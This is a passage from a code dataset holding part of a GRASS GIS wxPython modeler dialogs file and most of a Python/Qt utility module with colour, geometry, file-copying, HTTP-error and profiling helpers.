= wx.StaticBox(parent = self.panel, id = wx.ID_ANY,\n label=\" %s \" % _(\"List of items in loop\"))\n \n self.btnSeries = wx.Button(parent = self.panel, id = wx.ID_ANY,\n label = _(\"Series\"))\n self.btnSeries.SetToolTipString(_(\"Define map series as condition for the loop\"))\n self.btnSeries.Bind(wx.EVT_BUTTON, self.OnSeries)\n \n self._layout()\n self.SetMinSize(self.GetSize())\n self.SetSize((500, 400))\n \n def _layout(self):\n \"\"\"!Do layout\"\"\"\n sizer = wx.BoxSizer(wx.VERTICAL)\n \n condSizer = wx.StaticBoxSizer(self.condBox, wx.HORIZONTAL)\n condSizer.Add(item = self.condText, proportion = 1,\n flag = wx.ALL, border = 3)\n condSizer.Add(item = self.btnSeries, proportion = 0,\n flag = wx.EXPAND)\n\n listSizer = wx.StaticBoxSizer(self.listBox, wx.VERTICAL)\n listSizer.Add(item = self.itemList, proportion = 1,\n flag = wx.EXPAND | wx.ALL, border = 3)\n \n btnSizer = wx.StdDialogButtonSizer()\n btnSizer.AddButton(self.btnCancel)\n btnSizer.AddButton(self.btnOk)\n btnSizer.Realize()\n\n sizer.Add(item = condSizer, proportion = 0,\n flag = wx.EXPAND | wx.ALL, border = 3)\n sizer.Add(item = listSizer, proportion = 1,\n flag = wx.EXPAND | wx.LEFT | wx.RIGHT, border = 3)\n sizer.Add(item = btnSizer, proportion=0,\n flag = wx.EXPAND | wx.ALL | wx.ALIGN_CENTER, border=5)\n \n self.panel.SetSizer(sizer)\n sizer.Fit(self.panel)\n \n self.Layout()\n \n def GetItems(self):\n \"\"\"!Get list of selected actions\"\"\"\n return self.itemList.GetItems()\n\n def OnSeries(self, event):\n \"\"\"!Define map series as condition\"\"\"\n dialog = MapLayersDialog(parent = self, title = _(\"Define series of maps\"), modeler = True)\n if dialog.ShowModal() != wx.ID_OK:\n dialog.Destroy()\n return\n \n cond = dialog.GetDSeries()\n if not cond:\n cond = 'map in %s' % map(lambda x: str(x), dialog.GetMapLayers())\n \n self.condText.SetValue(cond)\n \n dialog.Destroy()\n\nclass ModelConditionDialog(ModelItemDialog):\n \"\"\"!Condition properties dialog\"\"\"\n def __init__(self, parent, shape, id = wx.ID_ANY, title = _(\"If-else properties\"),\n style = wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER, **kwargs):\n ModelItemDialog.__init__(self, parent, shape, title,\n style = style, **kwargs)\n \n self.listBoxIf = wx.StaticBox(parent = self.panel, id = wx.ID_ANY,\n label=\" %s \" % _(\"List of items in 'if' block\"))\n self.itemListIf = self.itemList\n self.itemListIf.SetName('IfBlockList')\n \n self.listBoxElse = wx.StaticBox(parent = self.panel, id = wx.ID_ANY,\n 
label=\" %s \" % _(\"List of items in 'else' block\"))\n self.itemListElse = ItemCheckListCtrl(parent = self.panel,\n window = self,\n columns = [_(\"ID\"), _(\"Name\"),\n _(\"Command\")],\n shape = shape)\n self.itemListElse.SetName('ElseBlockList')\n self.itemListElse.Populate(self.parent.GetModel().GetItems())\n \n self._layout()\n self.SetMinSize(self.GetSize())\n self.SetSize((500, 400))\n \n def _layout(self):\n \"\"\"!Do layout\"\"\"\n sizer = wx.BoxSizer(wx.VERTICAL)\n \n condSizer = wx.StaticBoxSizer(self.condBox, wx.VERTICAL)\n condSizer.Add(item = self.condText, proportion = 1,\n flag = wx.EXPAND)\n \n listIfSizer = wx.StaticBoxSizer(self.listBoxIf, wx.VERTICAL)\n listIfSizer.Add(item = self.itemListIf, proportion = 1,\n flag = wx.EXPAND)\n listElseSizer = wx.StaticBoxSizer(self.listBoxElse, wx.VERTICAL)\n listElseSizer.Add(item = self.itemListElse, proportion = 1,\n flag = wx.EXPAND)\n \n btnSizer = wx.StdDialogButtonSizer()\n btnSizer.AddButton(self.btnCancel)\n btnSizer.AddButton(self.btnOk)\n btnSizer.Realize()\n\n sizer.Add(item = condSizer, proportion = 0,\n flag = wx.EXPAND | wx.ALL, border = 3)\n sizer.Add(item = listIfSizer, proportion = 1,\n flag = wx.EXPAND | wx.LEFT | wx.RIGHT, border = 3)\n sizer.Add(item = listElseSizer, proportion = 1,\n flag = wx.EXPAND | wx.LEFT | wx.RIGHT, border = 3)\n sizer.Add(item = btnSizer, proportion=0,\n flag = wx.EXPAND | wx.ALL | wx.ALIGN_CENTER, border=5)\n \n self.panel.SetSizer(sizer)\n sizer.Fit(self.panel)\n \n self.Layout()\n\n def OnCheckItemIf(self, index, flag):\n \"\"\"!Item in if-block checked/unchecked\"\"\"\n if flag is False:\n return\n \n aId = int(self.itemListIf.GetItem(index, 0).GetText())\n if aId in self.itemListElse.GetItems()['checked']:\n self.itemListElse.CheckItemById(aId, False)\n \n def OnCheckItemElse(self, index, flag):\n \"\"\"!Item in else-block checked/unchecked\"\"\"\n if flag is False:\n return\n \n aId = int(self.itemListElse.GetItem(index, 0).GetText())\n if aId in self.itemListIf.GetItems()['checked']:\n self.itemListIf.CheckItemById(aId, False)\n \n def GetItems(self):\n \"\"\"!Get items\"\"\"\n return { 'if' : self.itemListIf.GetItems(),\n 'else' : self.itemListElse.GetItems() }\n\nclass ModelListCtrl(wx.ListCtrl,\n listmix.ListCtrlAutoWidthMixin,\n listmix.TextEditMixin,\n listmix.ColumnSorterMixin):\n def __init__(self, parent, columns, id = wx.ID_ANY,\n style = wx.LC_REPORT | wx.BORDER_NONE |\n wx.LC_SORT_ASCENDING |wx.LC_HRULES |\n wx.LC_VRULES, **kwargs):\n \"\"\"!List of model variables\"\"\"\n self.parent = parent\n self.columns = columns\n self.shape = None\n try:\n self.frame = parent.parent\n except AttributeError:\n self.frame = None\n \n wx.ListCtrl.__init__(self, parent, id = id, style = style, **kwargs)\n listmix.ListCtrlAutoWidthMixin.__init__(self)\n listmix.TextEditMixin.__init__(self)\n listmix.ColumnSorterMixin.__init__(self, 4)\n \n i = 0\n for col in columns:\n self.InsertColumn(i, col)\n self.SetColumnWidth(i, wx.LIST_AUTOSIZE_USEHEADER)\n i += 1\n \n self.itemDataMap = {} # requested by sorter\n self.itemCount = 0\n \n self.Bind(wx.EVT_LIST_BEGIN_LABEL_EDIT, self.OnBeginEdit)\n self.Bind(wx.EVT_LIST_END_LABEL_EDIT, self.OnEndEdit)\n self.Bind(wx.EVT_LIST_COL_CLICK, self.OnColClick)\n self.Bind(wx.EVT_COMMAND_RIGHT_CLICK, self.OnRightUp) #wxMSW\n self.Bind(wx.EVT_RIGHT_UP, self.OnRightUp) #wxGTK\n \n def OnBeginEdit(self, event):\n \"\"\"!Editing of item started\"\"\"\n event.Allow()\n\n def OnEndEdit(self, event):\n \"\"\"!Finish editing of item\"\"\"\n pass\n \n def 
OnColClick(self, event):\n \"\"\"!Click on column header (order by)\"\"\"\n event.Skip()\n\nclass VariableListCtrl(ModelListCtrl):\n def __init__(self, parent, columns, **kwargs):\n \"\"\"!List of model variables\"\"\"\n ModelListCtrl.__init__(self, parent, columns, **kwargs)\n\n self.SetColumnWidth(2, 200) # default value\n\n def GetListCtrl(self):\n \"\"\"!Used by ColumnSorterMixin\"\"\"\n return self\n \n def GetData(self):\n \"\"\"!Get list data\"\"\"\n return self.itemDataMap\n \n def Populate(self, data):\n \"\"\"!Populate the list\"\"\"\n self.itemDataMap = dict()\n i = 0\n for name, values in data.iteritems():\n self.itemDataMap[i] = [name, values['type'],\n values.get('value', ''),\n values.get('description', '')]\n i += 1\n \n self.itemCount = len(self.itemDataMap.keys())\n self.DeleteAllItems()\n i = 0\n for name, vtype, value, desc in self.itemDataMap.itervalues():\n index = self.InsertStringItem(sys.maxint, name)\n self.SetStringItem(index, 0, name)\n self.SetStringItem(index, 1, vtype)\n self.SetStringItem(index, 2, value)\n self.SetStringItem(index, 3, desc)\n self.SetItemData(index, i)\n i += 1\n \n def Append(self, name, vtype, value, desc):\n \"\"\"!Append new item to the list\n\n @return None on success\n @return error string\n \"\"\"\n for iname, ivtype, ivalue, idesc in self.itemDataMap.itervalues():\n if iname == name:\n return _(\"Variable <%s> already exists in the model. \"\n \"Adding variable failed.\") % name\n \n index = self.InsertStringItem(sys.maxint, name)\n self.SetStringItem(index, 0, name)\n self.SetStringItem(index, 1, vtype)\n self.SetStringItem(index, 2, value)\n self.SetStringItem(index, 3, desc)\n self.SetItemData(index, self.itemCount)\n \n self.itemDataMap[self.itemCount] = [name, vtype, value, desc]\n self.itemCount += 1\n \n return None\n\n def OnRemove(self, event):\n \"\"\"!Remove selected variable(s) from the model\"\"\"\n item = self.GetFirstSelected()\n while item != -1:\n self.DeleteItem(item)\n del self.itemDataMap[item]\n item = self.GetFirstSelected()\n self.parent.UpdateModelVariables()\n \n event.Skip()\n \n def OnRemoveAll(self, event):\n \"\"\"!Remove all variable(s) from the model\"\"\"\n dlg = wx.MessageBox(parent=self,\n message=_(\"Do you want to delete all variables from \"\n \"the model?\"),\n caption=_(\"Delete variables\"),\n style=wx.YES_NO | wx.CENTRE)\n if dlg != wx.YES:\n return\n \n self.DeleteAllItems()\n self.itemDataMap = dict()\n \n self.parent.UpdateModelVariables()\n \n def OnEndEdit(self, event):\n \"\"\"!Finish editing of item\"\"\"\n itemIndex = event.GetIndex()\n columnIndex = event.GetColumn()\n nameOld = self.GetItem(itemIndex, 0).GetText()\n\n if columnIndex == 0: # TODO\n event.Veto()\n \n self.itemDataMap[itemIndex][columnIndex] = event.GetText()\n \n self.parent.UpdateModelVariables()\n\n def OnReload(self, event):\n \"\"\"!Reload list of variables\"\"\"\n self.Populate(self.parent.parent.GetModel().GetVariables())\n\n def OnRightUp(self, event):\n \"\"\"!Mouse right button up\"\"\"\n if not hasattr(self, \"popupID1\"):\n self.popupID1 = wx.NewId()\n self.popupID2 = wx.NewId()\n self.popupID3 = wx.NewId()\n self.Bind(wx.EVT_MENU, self.OnRemove, id = self.popupID1)\n self.Bind(wx.EVT_MENU, self.OnRemoveAll, id = self.popupID2)\n self.Bind(wx.EVT_MENU, self.OnReload, id = self.popupID3)\n \n # generate popup-menu\n menu = wx.Menu()\n menu.Append(self.popupID1, _(\"Delete selected\"))\n menu.Append(self.popupID2, _(\"Delete all\"))\n if self.GetFirstSelected() == -1:\n menu.Enable(self.popupID1, False)\n 
menu.Enable(self.popupID2, False)\n \n menu.AppendSeparator()\n menu.Append(self.popupID3, _(\"Reload\"))\n \n self.PopupMenu(menu)\n menu.Destroy()\n\nclass ItemListCtrl(ModelListCtrl):\n def __init__(self, parent, columns, disablePopup = False, **kwargs):\n \"\"\"!List of model actions\"\"\"\n self.disablePopup = disablePopup\n \n ModelListCtrl.__init__(self, parent, columns, **kwargs)\n self.SetColumnWidth(1, 100)\n self.SetColumnWidth(2, 65)\n \n def GetListCtrl(self):\n \"\"\"!Used by ColumnSorterMixin\"\"\"\n return self\n \n def GetData(self):\n \"\"\"!Get list data\"\"\"\n return self.itemDataMap\n \n def Populate(self, data):\n \"\"\"!Populate the list\"\"\"\n self.itemDataMap = dict()\n \n if self.shape:\n if isinstance(self.shape, ModelCondition):\n if self.GetName() == 'ElseBlockList':\n shapeItems = map(lambda x: x.GetId(), self.shape.GetItems()['else'])\n else:\n shapeItems = map(lambda x: x.GetId(), self.shape.GetItems()['if'])\n else:\n shapeItems = map(lambda x: x.GetId(), self.shape.GetItems())\n else:\n shapeItems = list()\n \n i = 0\n if len(self.columns) == 3: # ItemCheckList\n checked = list()\n for action in data:\n if isinstance(action, ModelData) or \\\n action == self.shape:\n continue\n \n if len(self.columns) == 3:\n self.itemDataMap[i] = [str(action.GetId()),\n action.GetName(),\n action.GetLog()]\n aId = action.GetBlockId()\n if action.GetId() in shapeItems:\n checked.append(aId)\n else:\n checked.append(None)\n else:\n bId = action.GetBlockId()\n if not bId:\n bId = ''\n self.itemDataMap[i] = [str(action.GetId()),\n action.GetName(),\n ','.join(map(str, bId)),\n action.GetLog()]\n \n i += 1\n \n self.itemCount = len(self.itemDataMap.keys())\n self.DeleteAllItems()\n i = 0\n if len(self.columns) == 3:\n for aid, name, desc in self.itemDataMap.itervalues():\n index = self.InsertStringItem(sys.maxint, aid)\n self.SetStringItem(index, 0, aid)\n self.SetStringItem(index, 1, name)\n self.SetStringItem(index, 2, desc)\n self.SetItemData(index, i)\n if checked[i]:\n self.CheckItem(index, True)\n i += 1\n else:\n for aid, name, inloop, desc in self.itemDataMap.itervalues():\n index = self.InsertStringItem(sys.maxint, aid)\n self.SetStringItem(index, 0, aid)\n self.SetStringItem(index, 1, name)\n self.SetStringItem(index, 2, inloop)\n self.SetStringItem(index, 3, desc)\n self.SetItemData(index, i)\n i += 1\n \n def OnRemove(self, event):\n \"\"\"!Remove selected action(s) from the model\"\"\"\n model = self.frame.GetModel()\n canvas = self.frame.GetCanvas()\n \n item = self.GetFirstSelected()\n while item != -1:\n aId = self.GetItem(item, 0).GetText()\n self.DeleteItem(item)\n del self.itemDataMap[item]\n \n action = model.GetItem(int(aId))\n if not action:\n item = self.GetFirstSelected()\n continue\n \n model.RemoveItem(action)\n canvas.GetDiagram().RemoveShape(action)\n self.frame.ModelChanged()\n \n item = self.GetFirstSelected()\n \n canvas.Refresh()\n \n event.Skip()\n \n def OnRemoveAll(self, event):\n \"\"\"!Remove all action(s) from the model\"\"\"\n deleteDialog = wx.MessageBox(parent=self,\n message=_(\"Do you want to delete all actions \"
\"from the model?\"),\n caption=_(\"Delete actions\"),\n style=wx.YES_NO | wx.CENTRE)\n if deleteDialog != wx.YES:\n return False\n \n self.DeleteAllItems()\n self.itemDataMap = dict()\n\n self.parent.UpdateModelVariables()\n\n def OnEndEdit(self, event):\n \"\"\"!Finish editing of item\"\"\"\n itemIndex = event.GetIndex()\n columnIndex = event.GetColumn()\n \n self.itemDataMap[itemIndex][columnIndex] = event.GetText()\n \n aId = int(self.GetItem(itemIndex, 0).GetText())\n action = self.frame.GetModel().GetItem(aId)\n if not action:\n event.Veto()\n return\n if columnIndex == 0:\n action.SetId(int(event.GetText()))\n \n self.frame.ModelChanged()\n\n def OnReload(self, event = None):\n \"\"\"!Reload list of actions\"\"\"\n self.Populate(self.frame.GetModel().GetItems())\n\n def OnRightUp(self, event):\n \"\"\"!Mouse right button up\"\"\"\n if self.disablePopup:\n return\n \n if not hasattr(self, \"popupID1\"):\n self.popupID1 = wx.NewId()\n self.popupID2 = wx.NewId()\n self.popupID3 = wx.NewId()\n self.popupID4 = wx.NewId()\n self.Bind(wx.EVT_MENU, self.OnRemove, id = self.popupID1)\n self.Bind(wx.EVT_MENU, self.OnRemoveAll, id = self.popupID2)\n self.Bind(wx.EVT_MENU, self.OnReload, id = self.popupID3)\n self.Bind(wx.EVT_MENU, self.OnNormalize, id = self.popupID4)\n\n # generate popup-menu\n menu = wx.Menu()\n menu.Append(self.popupID1, _(\"Delete selected\"))\n menu.Append(self.popupID2, _(\"Delete all\"))\n if self.GetFirstSelected() == -1:\n menu.Enable(self.popupID1, False)\n menu.Enable(self.popupID2, False)\n \n menu.AppendSeparator()\n menu.Append(self.popupID4, _(\"Normalize\"))\n menu.Append(self.popupID3, _(\"Reload\"))\n \n self.PopupMenu(menu)\n menu.Destroy()\n \n def OnNormalize(self, event):\n \"\"\"!Update id of actions\"\"\"\n model = self.frame.GetModel()\n \n aId = 1\n for item in model.GetItems():\n item.SetId(aId)\n aId += 1\n \n self.OnReload(None)\n self.frame.GetCanvas().Refresh()\n self.frame.ModelChanged()\n\nclass ItemCheckListCtrl(ItemListCtrl, listmix.CheckListCtrlMixin):\n def __init__(self, parent, shape, columns, window = None, **kwargs):\n self.parent = parent\n self.window = window\n \n ItemListCtrl.__init__(self, parent, columns, disablePopup = True, **kwargs)\n listmix.CheckListCtrlMixin.__init__(self)\n self.SetColumnWidth(0, 50)\n \n self.shape = shape\n \n def OnBeginEdit(self, event):\n \"\"\"!Disable editing\"\"\"\n event.Veto()\n \n def OnCheckItem(self, index, flag):\n \"\"\"!Item checked/unchecked\"\"\"\n name = self.GetName()\n if name == 'IfBlockList' and self.window:\n self.window.OnCheckItemIf(index, flag)\n elif name == 'ElseBlockList' and self.window:\n self.window.OnCheckItemElse(index, flag)\n \n def GetItems(self):\n \"\"\"!Get list of selected actions\"\"\"\n ids = { 'checked' : list(),\n 'unchecked' : list() }\n for i in range(self.GetItemCount()):\n iId = int(self.GetItem(i, 0).GetText())\n if self.IsChecked(i):\n ids['checked'].append(iId)\n else:\n ids['unchecked'].append(iId)\n \n return ids\n\n def CheckItemById(self, aId, flag):\n \"\"\"!Check/uncheck given item by id\"\"\"\n for i in range(self.GetItemCount()):\n iId = int(self.GetItem(i, 0).GetText())\n if iId == aId:\n self.CheckItem(i, flag)\n break\n","repo_name":"OSGeo/grass-legacy","sub_path":"gui/wxpython/gmodeler/dialogs.py","file_name":"dialogs.py","file_ext":"py","file_size_in_byte":35799,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"60"} 
+{"seq_id":"10828195824","text":"\"\"\"\nMiscellaneous useful methods for Python and/or Qt apps.\n\"\"\"\n\n\nfrom .pyqt import *\nimport os, os.path, time, math, collections.abc\nfrom .debug import *\n\n\n\n\n\ndef csToBool(cs):\n if cs == Qt.Checked:\n return True\n elif cs == Qt.PartiallyChecked:\n return True\n elif cs == Qt.Unchecked:\n return False\n\n# https://stackoverflow.com/questions/596216/formula-to-determine-brightness-of-rgb-color\n# https://www.w3.org/TR/AERT/#color-contrast\ndef luminanceOf(color):\n return ( 0.299 * color.redF() + 0.587 * color.greenF() + 0.114 * color.blueF() )\n\ndef isLightColor(color):\n return color.alphaF() < 1 or luminanceOf(color) >= .7\n\ndef contrastTo(color):\n if isLightColor(color):\n return QColor(Qt.black)\n else:\n return QColor(Qt.white)\n\n# https://stackoverflow.com/questions/12228548/finding-equivalent-color-with-opacity\ndef lightenOpacity(c, a):\n w = QColor('white')\n r1, g1, b1 = c.red(), c.green(), c.blue()\n r2, g2, b2 = w.red(), w.green(), w.blue()\n r3 = r2 + (r1 - r2) * a\n g3 = g2 + (g1 - g2) * a\n b3 = b2 + (b1 - b2) * a\n return QColor(int(r3), int(g3), int(b3))\n\n\n# https://www.qtcentre.org/threads/3205-Toplevel-widget-with-rounded-corners\ndef roundedRectRegion(rect, radius, parts):\n \"\"\" parts = ('bottom-left', 'top-right', ...)\n USAGE:\n self.setMask(util.roundedRectRegion(self.rect(), util.BORDER_RADIUS)) \n \"\"\"\n region = QRegion()\n # middle and borders\n region += rect.adjusted(radius, 0, -radius, 0)\n region += rect.adjusted(0, radius, 0, -radius)\n corner = QRect(QPoint(0, 0), QSize(radius * 2, radius * 2))\n if 'top-left' in parts:\n corner.moveTopLeft(rect.topLeft())\n region += QRegion(corner, QRegion.Ellipse)\n if 'top-right' in parts:\n corner.moveTopRight(rect.topRight())\n region += QRegion(corner, QRegion.Ellipse)\n if 'bottom-left' in parts:\n corner.moveBottomLeft(rect.bottomLeft())\n region += QRegion(corner, QRegion.Ellipse)\n if 'bottom-right' in parts:\n corner.moveBottomRight(rect.bottomRight())\n region += QRegion(corner, QRegion.Ellipse)\n return region\n\n\ndef deepMerge(d, u, ignore=[]):\n \"\"\" Recursively merge dict `u` in to dict `d`. \"\"\"\n if not isinstance(ignore, list):\n ignore = [ignore]\n for k, v in u.items():\n if k in ignore:\n continue\n if isinstance(v, collections.abc.Mapping) and (k in d):\n d[k] = deepMerge(d.get(k, {}), v, ignore=ignore)\n else:\n d[k] = v\n return d\n\ndef invertPixmap(p):\n img = p.toImage()\n img.invertPixels()\n return QPixmap.fromImage(img)\n\ndef rindex(lst, val, start=None):\n if start is None:\n start = len(lst)-1\n for i in xrange(start,-1,-1):\n if lst[i] == val:\n return i\n\ndef rindex(li, x):\n for i in reversed(range(len(li))):\n if li[i] == x:\n return i\n raise ValueError(\"{} is not in list\".format(x))\n\ndef suffix(s):\n if '.' 
in s:\n return s[s.rfind('.')+1:]\n else:\n return None\n\ndef fileName(filePath):\n return filePath[filePath.rfind(os.sep)+1:]\n\n\ndef newNameOf(items, tmpl, key):\n if not items:\n return tmpl % 1\n name = None\n for i in range(10000):\n name = tmpl % (i+1)\n found = False\n for row, item in enumerate(items):\n if key(item) == name:\n found = True\n break\n if not found:\n break\n return name\n \n\n\n\ndef printQObject(o):\n mo = o.metaObject()\n properties = []\n signals = []\n slots = []\n etc = []\n for i in range(mo.propertyCount()):\n properties.append(mo.property(i).name())\n for i in range(mo.methodCount()):\n meth = mo.method(i)\n if meth.methodType() == QMetaMethod.Signal:\n signals.append(bytes(meth.methodSignature()).decode())\n elif meth.methodType() == QMetaMethod.Slot:\n slots.append(bytes(meth.methodSignature()).decode())\n else:\n etc.append(bytes(meth.methodSignature()).decode())\n Debug(' ')\n Debug('QOBJECT:', o.__class__.__name__, 'objectName: \"%s\"' % o.objectName())\n for i in sorted(properties):\n Debug(' PROPERTY: ', i)\n for i in sorted(signals):\n Debug(' SIGNAL: ', i)\n for i in sorted(slots):\n Debug(' SLOT: ', i)\n for i in sorted(etc):\n Debug(' METHOD: ', i)\n\n\n\ndef lelide(data, length):\n return ('...' + data[len(data) - (length-4):]) if len(data) > (length-4) else data\n\ndef ljust(data, length):\n if len(data) > length:\n data = lelide(data, length)\n return data.ljust(length)\n\ndef runModel(model, silent=True, columns=None):\n WIDTH = 25\n if not silent:\n Debug('MODEL:', model.__class__.__name__, 'objectName: \"%s\"' % model.objectName())\n sys.stdout.write(' %s|' % ljust('Column', 10))\n nCols = model.columnCount()\n for col in range(model.columnCount()):\n if columns is not None and not col in columns:\n continue\n header = model.headerData(col, Qt.Horizontal)\n if not silent:\n if col < nCols-1:\n sys.stdout.write(' %s|' % ljust(header, WIDTH))\n else:\n sys.stdout.write(' %s' % ljust(header, WIDTH))\n if not silent:\n print()\n for row in range(model.rowCount()):\n if not silent:\n sys.stdout.write(' %s|' % ljust(str(row), 10))\n for col in range(model.columnCount()):\n if columns is not None and not col in columns:\n continue\n index = model.index(row, col)\n if -1 in (index.row(), index.column()):\n raise ValueError('invalid index: row: %s, col: %s' % (row, col))\n value = model.data(index, Qt.DisplayRole)\n if not silent:\n if col < nCols-1:\n sys.stdout.write(' %s|' % ljust(str(value), WIDTH))\n else:\n sys.stdout.write(' %s' % ljust(str(value), WIDTH))\n if not silent:\n print()\n\n\ndef printModel(model, columns):\n runModel(model, silent=False, columns=columns)\n\n\n\n### Geometry functions\n\n\ndef distance(p1, p2):\n \"\"\" pythagorean \"\"\"\n a = p1.x() - p2.x()\n b = p1.y() - p2.y()\n return math.sqrt(a*a + b*b)\n\n\ndef pointOnRay(orig, dest, distance):\n \"\"\" Calculate a point on ray (orig, dest) from orig \"\"\"\n a = dest.x() - orig.x()\n b = dest.y() - orig.y()\n c = math.sqrt(pow(a, 2) + pow(b, 2)) # pythagorean\n if c > 0:\n p = distance / c\n else:\n p = 0\n return QPointF(orig.x() + p * a, orig.y() + p * b)\n\n\ndef perpendicular(pointA, pointB, reverse=False, width=None):\n \"\"\"Return pointC such that ray\n (pointC, pointB) is perpendicular to ray (pointA, pointB).\n \"\"\"\n if reverse:\n pointB, pointA = pointA, pointB\n x1 = pointA.x()\n x2 = pointB.x()\n y1 = pointA.y()\n y2 = pointB.y()\n a = x1 - x2\n b = y1 - y2\n if reverse is True:\n x3 = x2 - b\n y3 = y2 + a\n else:\n x3 = x2 + b\n y3 = y2 - a\n if width 
is None:\n return QPointF(x3, y3)\n else:\n return QPointF(pointOnRay(pointB, QPointF(x3, y3), width))\n\n\n# def drawTextAroundPoint(painter, x, y, flags, text, boundingRect=None):\n# size = 32767.0\n# corner = QPointF(x, y - size)\n# if flags & Qt.AlignHCenter:\n# corner.setX(corner.x() - (size / 2.0))\n# elif flags & Qt.AlignRight:\n# corner.setX(corner.x() - size)\n# if flags & Qt.AlignVCenter:\n# corner.setY(corner.y() + size / 2.0)\n# elif flags & Qt.AlignTop:\n# corner.setY(corner.y() + size)\n# else:\n# flags |= Qt.AlignBottom\n# rect = QRectF(corner.x(), corner.y(), size, size)\n# painter.drawText(rect, flags, text, boundingRect)\n\n\ndef dateOverlap(startA, endA, startB, endB):\n if (not startA and not endA) or (not startB and not endB):\n return True\n if startA is None: startA = QDate()\n if endA is None: endA = QDate()\n if startB is None: startB = QDate()\n if endB is None: endB = QDate()\n return startA <= endB and endA >= startB\n\n\n\ndef checkHTTPReply(reply):\n \"\"\" Generic http code handling. \"\"\"\n error = reply.error()\n ret = None\n if error == QNetworkReply.NoError:\n ret = True\n elif error == QNetworkReply.HostNotFoundError: # no internet connection\n Debug('No internet connection')\n ret = False\n elif error == QNetworkReply.ConnectionRefusedError:\n if IS_MOD_TEST:\n Debug('Connection refused:', reply.url().toString())\n ret = False\n elif error == QNetworkReply.ContentAccessDenied:\n Debug('Access Denied:', reply.url().toString())\n ret = False\n elif error == QNetworkReply.AuthenticationRequiredError:\n ret = True\n elif error == QNetworkReply.ContentNotFoundError:\n # if not IS_TEST:\n # Debug('404 Not Found: ' + reply.url().toString())\n ret = False\n elif error == QNetworkReply.OperationCanceledError: # reply.abort() called\n ret = False\n elif error == QNetworkReply.SslHandshakeFailedError:\n Debug('SSL handshake with server failed.')\n ret = False\n else:\n if reply.operation() == QNetworkAccessManager.HeadOperation:\n verb = 'HEAD'\n elif reply.operation() == QNetworkAccessManager.GetOperation:\n verb = 'GET'\n elif reply.operation() == QNetworkAccessManager.PutOperation:\n verb = 'PUT'\n elif reply.operation() == QNetworkAccessManager.PostOperation:\n verb = 'POST'\n elif reply.operation() == QNetworkAccessManager.DeleteOperation:\n verb = 'DELETE'\n elif reply.operation() == QNetworkAccessManager.CustomOperation:\n verb = ''\n Debug('ERROR Qt reply:') # ', error)\n Debug(' URL:', reply.request().url().toString())\n Debug(' HTTP method:', verb)\n Debug(' HTTP code:', reply.attribute(QNetworkRequest.HttpStatusCodeAttribute))\n Debug(' RESPONSE HEADERS:')\n for k, v in reply.rawHeaderPairs():\n Debug(' ', str(k), str(v))\n ret = False\n return ret\n\n\n\ndef file_md5(fpath):\n import hashlib\n if not QFileInfo(fpath).isFile():\n return\n hash_md5 = hashlib.md5()\n f = QFile(fpath)\n if not f.open(QIODevice.ReadOnly):\n Debug('Could not open file for reading:', fpath)\n return\n for chunk in iter(lambda: f.read(4096), b\"\"):\n hash_md5.update(chunk)\n return hash_md5.hexdigest()\n\n\n\ndef fileEquals(filePath1, filePath2):\n if not QFileInfo(filePath1).isFile() or not QFileInfo(filePath2).isFile():\n return False\n md5_1 = file_md5(filePath1)\n md5_2 = file_md5(filePath2)\n return md5_1 == md5_2\n\n\ndef copyFileOrDir(src, dst):\n \"\"\" cp -R \"\"\"\n Debug('copyFileOrDir: +++', src)\n Debug('copyFileOrDir: ---', dst)\n if QFileInfo(src).isFile():\n if not QFileInfo(dst).isFile() or not fileEquals(src, dst):\n dest_dir = os.path.dirname(dst)\n if not 
os.path.isdir(dest_dir):\n os.mkdir(dest_dir)\n if QFile.copy(src, dst):\n Debug('Wrote file', dst)\n else:\n Debug('Could not write file', dst)\n else:\n dir = QDir(src)\n\n for d in dir.entryList(QDir.Dirs | QDir.NoDotAndDotDot):\n dst_path = os.path.join(dst, d)\n dir.mkpath(dst_path)\n copyFileOrDir(os.path.join(src, d), dst_path)\n\n for f in dir.entryList(QDir.Files):\n dirPath = QFileInfo(os.path.join(dst, f)).absolutePath()\n if not QDir(dirPath).exists():\n if not QDir(dirPath).mkpath(\".\"):\n Debug(\"Could not create path\", dirPath)\n continue\n # Debug('>>>')\n copyFileOrDir(os.path.join(src, f), os.path.join(dst, f))\n # Debug('<<<')\n\n\ndef qenum(base, value):\n \"\"\"Convert a Qt Enum value to its key as a string.\n\n Args:\n base: The object the enum is in, e.g. QFrame.\n value: The value to get.\n\n Return:\n The key associated with the value as a string, or None.\n \"\"\"\n klass = value.__class__\n try:\n idx = klass.staticMetaObject.indexOfEnumerator(klass.__name__)\n except AttributeError:\n idx = -1\n keyName = None\n if idx != -1:\n keyName = klass.staticMetaObject.enumerator(idx).valueToKey(value)\n else:\n for name, obj in vars(base).items():\n if isinstance(obj, klass) and obj == value:\n keyName = name\n break\n if keyName:\n return '%s.%s' % (base.__name__, keyName)\n\n\ndef shouldFullScreen():\n IS_IPHONE = bool(CUtil.instance().operatingSystem() == CUtil.OS_iPhone)\n Debug(CUtil.instance().operatingSystem(), CUtil.OS_iPhone)\n return IS_IPHONE\n\n\n\n\n#####################################################\n##\n## Dev and Test utils\n##\n#####################################################\n\n_profile = None\ndef startProfile():\n global _profile\n \n ### Std Python profiler\n import cProfile\n _profile = cProfile.Profile()\n _profile.enable()\n\n ### pyinstrument\n # import pyinstrument\n # self.profile = pyinstrument.Profiler()\n\n ### pycallgraph\n # from pycallgraph import PyCallGraph\n # from pycallgraph.output import GraphvizOutput\n # graphviz = GraphvizOutput(output_file='profile.png')\n # self.profiler = PyCallGraph(output=graphviz)\n # self.profiler.start()\n\ndef stopProfile():\n global _profile\n \n ### Std python profiler\n _profile.disable()\n import io, pstats\n s = io.StringIO()\n sortby = 'cumulative'\n ps = pstats.Stats(_profile, stream=s).sort_stats(sortby)\n ps.print_stats() # ('pksampler')\n Debug(s.getvalue())\n _profile = None\n\n ### pyinstrument\n # self.profiler.stop()\n # self.here(profiler.output_text(unicode=True, color=True))\n # self.profiler = None\n\n ### pycallgraph\n # self.profiler.done()\n # self.profiler = None # saves file\n # os.system('open profile.png')\n \n\ndef wait_for_attach():\n PORT = 3001\n Debug('Waiting for debugger to attach to port %i...' % PORT)\n # import ptvsd\n # ptvsd.enable_attach(address=('127.0.0.1', PORT)) #, redirect_output=True)\n # ptvsd.wait_for_attach()\n import debugpy\n debugpy.listen(PORT)\n debugpy.wait_for_client()\n\n\nclass Condition(Debug):\n \"\"\" Allows you to wait for a signal to be called. 
